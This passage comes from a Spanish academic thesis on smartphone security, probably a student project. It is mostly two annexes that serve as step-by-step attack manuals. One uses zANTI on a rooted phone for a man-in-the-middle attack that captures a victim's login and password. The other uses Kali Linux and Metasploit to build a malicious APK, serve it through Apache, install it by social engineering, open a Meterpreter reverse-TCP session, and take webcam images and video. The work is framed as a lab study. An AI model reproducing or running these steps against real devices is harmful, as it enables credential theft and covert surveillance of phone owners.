El Tiempo, C. E. (2017). Huawei, Oppo y Vivo crecen más de 20 % en el
mercado de celulares. Recuperado 11 de diciembre de 2017, a partir de
http://www.eltiempo.com/tecnosfera/novedades-tecnologia/los-celulares-
mas-vendidos-de-2017-82648
Erreyes, D. M. (2017). Metodología para la selección de herramientas eficientes
y protocolos adecuados para mejorar la seguridad de los dispositivos
móviles.
García, C. (2017). Seguridad en smartphones: análisis de riesgos, de
vulnerabilidades y auditorías de dispositivos. Recuperado a partir de
http://openaccess.uoc.edu/webapps/o2/handle/10609/60705
Gartner. (2017). Gartner Says Worldwide Sales of Smartphones Grew 7 Percent
in the Fourth Quarter of 2016. Recuperado 10 de noviembre de 2017, a
partir de https://www.gartner.com/newsroom/id/3609817
GSMA. (2017). GSMA. Recuperado 25 de diciembre de 2017, a partir de
https://www.gsma.com/
Iván. (2016, enero 9). Qué es un benchmark y para qué nos puede servir.
Recuperado 14 de diciembre de 2017, a partir de
https://elandroidelibre.elespanol.com/2016/01/que-es-un-benchmark.html
Mahecha, M. A., & Tavera, W. S. (2016). Identificación de los ataques más
realizados en un sitio concurrido por personas que utilizan sus
dispositivos móviles y determinación de las vulnerabilidades más
comunes en el sistema operativo Android.
105
Morales, J. C. (2012, octubre 1). SISTEMAS OPERATIVOS: Actividad 3:
Criterios de Planificación del CPU. Recuperado 14 de noviembre de
2017, a partir de http://juaanka.blogspot.com/2012/10/actividad-3-
criterios-de-planificacion.html
Morelo, J. S., & Betancur, D. (2013). Análisis forense al sistema Android afectado
por el malware Fakelookout y su solución.
Osorio, R. D., & Ramírez, C. A. (2011). Características y parámetros de la
seguridad para los Smartphones con sistema operativo Android.
Universidad Tecnológica de Pereira.
Prieto, J., Ramírez, R., Morillo, J. D., & Prieto, M. D. (2011). Tecnología y
desarrollo en dispositivos móviles. Universitat Oberta de Catalunya.
Roa, J. F. (2013). Seguridad informática. McGraw-Hill España.
Rodríguez, V. M., & Quimí, J. E. (2016). Implementación de un modelo para la
administración de movilidad empresarial, considerando sistemas android,
ios y windows phone (B.S. thesis). Espol.
Salellas, L. (2017). Glosario de términos técnicos de auditoria en seguridad.
Recuperado 5 de enero de 2018, a partir de
http://www.forodeseguridad.com/artic/discipl/4135.htm
Seguridadpc.net. (2017). ¿Qué son los Ciberdelincuentes? Recuperado 16 de
diciembre de 2017, a partir de http://www.seguridadpc.net/conceptos/los-
ciberdelincuentes.html
Solvetic Seguridad. (2017). ZANTI herramienta de hacking y seguridad desde
Android. Recuperado 31 de diciembre de 2017, a partir de
https://www.solvetic.com/tutoriales/article/1995-zanti-herramienta-de-
hacking-y-seguridad-desde-en-android/
106
StatCounter. (2017). Operating System Market Share Worldwide. Recuperado 24
de diciembre de 2017, a partir de http://gs.statcounter.com/os-market-
share
Thompson, I. (2008). DEFINICIÓN DE INFORMACIÓN - Promonegocios.net.
Recuperado 28 de noviembre de 2017, a partir de
https://www.promonegocios.net/mercadotecnia/definicion-
informacion.html
Villa, H. M. (2016). Desarrollo de una aplicación que permita el escaneo de las
vulnerabilidades en los dispositivos móviles Android para mitigar los
problemas de seguridad. Escuela Superior Politécnica de Chimborazo.
109
ANEXO 2
MANUAL TÉCNICO DE ATAQUES INFORMÁTICOS DESDE ZANTI
Procedimiento de instalación de Zanti
1. Rootear el teléfono Android con la aplicación KingRoot
Elaboración: Ruth Asqui
Fuente: KINGROOT
2. Descargar Zanti desde el navegador del móvil, porque la aplicación todavía no
está disponible en la Play Store de los teléfonos Android, pero si es compatible
para éste sistema operativo.
FIGURA N° 1
PANTALLA DE KINGROOT
110
Elaboración: Ruth Asqui
Fuente: Teléfono Samsung
3. Abrir Zanti y proceder hacer un mapeo de red local, para identificar a la víctima.
Seleccionamos el icono que está sombreado de amarillo y después aparecerá la
pantalla de Mapea tu red y seleccionamos en OK.
FIGURA N° 2
PANTALLA DE INSTALACIÓN DE ZANTI
111
Elaboración: Ruth Asqui
Fuente: Zanti
4. Seleccionamos la ip víctima en este caso es 192.168.100.17 del dispositivo
Android.
FIGURA N° 4
REDES CONECTADAS A LA RED
Elaboración: Ruth Asqui
Fuente: Zanti
FIGURA N° 3
PROCESO DE MAPEO DE RED
LOCAL
112
5. Seleccionar la Acción de ataque, en este caso es Man in the Middle
Elaboración: Ruth Asqui
Fuente: Zanti
6. Seleccionamos el botón que se encuentra en la parte derecha superior para
cambiar de OFF a ON; para habilitar las opciones de acceso que se presenta a
continuación y después seleccionar en Ver de la opción Pedidos registrados
FIGURA N° 5
PANTALLA DE ACCIONES DE ATAQUES EN ZANTI
113
Elaboración: Ruth Asqui
Fuente: Zanti
7. Seleccionar la página web que deseemos acceder de las sesiones que la
víctima ha accedido, en este caso seleccione el link de
http://www.cursodehackers.com
FIGURA N° 6
OPCIONES DE ZANTI DE LA VÍCTIMA
114
Elaboración: Ruth Asqui
Fuente: Zanti
8. A continuación, se observa el robo de usuario y contraseña de la página web
de la victima
La información accedida se encuentra en el Gráfico N° 12, en la sección de
integridad, donde se hicieron los ataques informáticos en Android
FIGURA N° 7
PÁGINAS WEB VISITADAS POR LA VÍCTIMA
115
Elaboración: Ruth Asqui
Fuente: Zanti
Para explicar los siguientes ataques realizados, ya se seleccionaron y activaron
con ON las acciones, en la pantalla de la Figura N°6 de OPCIONES DE ZANTI DE
LA VÍCTIMA
La activación de la opción Redirigir HTTP, lo cual no permite a la víctima acceder
a ninguna página web que desee y lo envía a una página que por defecto utiliza
Zanti.
La activación de la opción Reemplazar imágenes, permite que la víctima no
pueda observar la información real en la página que acceda ; sino obtendrá
información errónea porque aparecerá la imagen que el atacante inserto en Zanti.
También se activó la opción Insertar HTLM, en donde se escribe el mensaje que
él atacante desee que aparezca, cuando la víctima acceda a internet.
Todos los resultados se encuentran en las pantallas de los ataques informáticos
realizas tanto para Android e iOS.
FIGURA N° 8
PANTALLA DE ROBO DE USUARIO Y CONTRASEÑA DE LA VÍCTIMA
116
ANEXO 3
MANUAL TÉCNICO DE ATAQUES INFORMÁTICOS DESDE METASPLOIT
(KALI LINUX)
1. Descargar la máquina virtual de Kali Linux desde la página oficial y después
importarla desde VMware o VMbox. Se utilizó Kali-Linux-2017.1-vbox-amd64.ova
Elaboración: Ruth Asqui
Fuente: Kali Linux
2. Abrir el terminal de Kali Linux y ejecutar la siguiente línea de comando, para
saber nuestra dirección ip
# ifconfig
El resultado fue 192.168.1.150, esta dirección ip es del atacante
FIGURA N° 9
PANTALLA DE KALI LINUX
117
Conectar la máquina Anfitrión y Virtual a la misma red; esto se verifica haciendo
ping entre ellas.
3. Mapeo de red local desde Kali Linux con nmap para verificar los equipos activos
conectados a la red.
Abrir el terminal de Kali Linux y escribimos la siguiente línea de comando:
# nmap – sP 192.168.1.0-255
Se escribieron los 3 primeros Byte de la dirección ip y después .0-255.
Elaboración: Ruth Asqui
Fuente: Kali Linux
En la Figura N° 10, se observa las víctimas activas, para el ataque se eligió la ip
192.168.1.129 del teléfono Samsung J5 ya que es del sistema operativo Android.
FIGURA N° 10
VÍCTIMAS ACTIVAS EN LA RED LOCAL
118
4. Se procede a crear un virus para Android a continuación:
La línea de comando para crear el virus se encuentra en los ataques informáticos
que se realizó a Android; en la sección de Integridad y Confidencialidad con
Metasploit; lo cual se denota en el Grafica N° 13 del estudio.
5. El Virus creado que es un archivo App1.apk, se procede a guardar en la carpeta
de: Files/Other Locations/Computer/var/www/html
Elaboración: Ruth Asqui
Fuente: Kali Linux
FIGURA N° 11
VIRUS GUARDADO EN LA CARPETA HTML
119
6. Se continúa y se levanta el servidor Apache2 con el comando: # service
apache2 start
Elaboración: Ruth Asqui
Fuente: Kali Linux
7. Se instala el virus en el teléfono móvil, esto se observa en el Grafico N° 14 del
estudio, esto se encuentra en la sección de Ataques en Android. Para la
instalación del virus en el teléfono, se utilizó la ip 192.168.1.129 de la víctima; y
aplicar la ingeniería social.
FIGURA N° 12
SERVICIO APACHE2 INICIADO
120
Elaboración: Ruth Asqui
Fuente: Android
En la Figura N° 13, se observa la inyección del virus en Android llamado
MainActivity.
8. Abrir el terminal de Kali Linux y levantar metasploit con la línea de comando
# msfconsole
Elaboración: Ruth Asqui
Fuente: Kali Linux
FIGURA N° 13
VIRUS INSTALADO A LA VÍCTIMA
FIGURA N° 14
PANTALLA DE METASPLOIT ABIERTA
121
9. Abrir el handler para estar en escucha, cuando la víctima se conecte a
nosotros. A continuación, se ejecuta la siguiente línea de comando:
# use exploit/multi/handler
10. Set los parámetros de payload, mediante los siguientes parámetros Handler
estará en escucha, estos parámetros son donde creamos el archivo del virus
# set payload Android/meterpreter/reverse_tcp
# set lhost 192.168.1.150
# set lport 4321
11. Iniciar el exploit
Ejecutar la siguiente línea de comando, para estar en escucha de la víctima
# exploit
Elaboración: Ruth Asqui
Fuente: Kali Linux
FIGURA N° 15
ATACANTE EN ESCUCHA DE LA VÍCTIMA
122
12. Insertamos la línea de comando en meterpreter >?
Al insertar el signo de interrogación en el meterpreter, presionamos ENTER y se
desplazara la pantalla de los comandos que se puede acceder en Android
Elaboración: Ruth Asqui
Fuente: Kali Linux
13. Acceder a la información mediante los comandos de la Figura 16
webcam_snap
Captura la imagen que la cámara web está apuntando en ese momento.
FIGURA N° 16
LISTA DE COMANDOS DE ACCESO EN ANDROID
123
Elaboración: Ruth Asqui
Fuente: Kali Linux
webcam_stream
Reproduce una secuencia de videos de la cámara web
Elaboración: Ruth Asqui
Fuente: Kali Linux
Elaboración: Ruth Asqui
Fuente: Kali Linux
FIGURA N° 17
CAPTURA DE IMAGEN DE LA CÁMARA WEB
FIGURA N° 18
GRABACIÓN DE VIDEO
124
Así se puede seguir mostrando la información del teléfono Android, tan solo con
ejecutar las líneas de comandos de la Figura N° 16. Puede seguir ejecutando las
líneas de comando que se requiera, por parte del autor deja en constancia la
información accedida y adquirida en el presente anexo y también en la sección de
Ataques en Android en el Gráfico N° 18 del proyecto.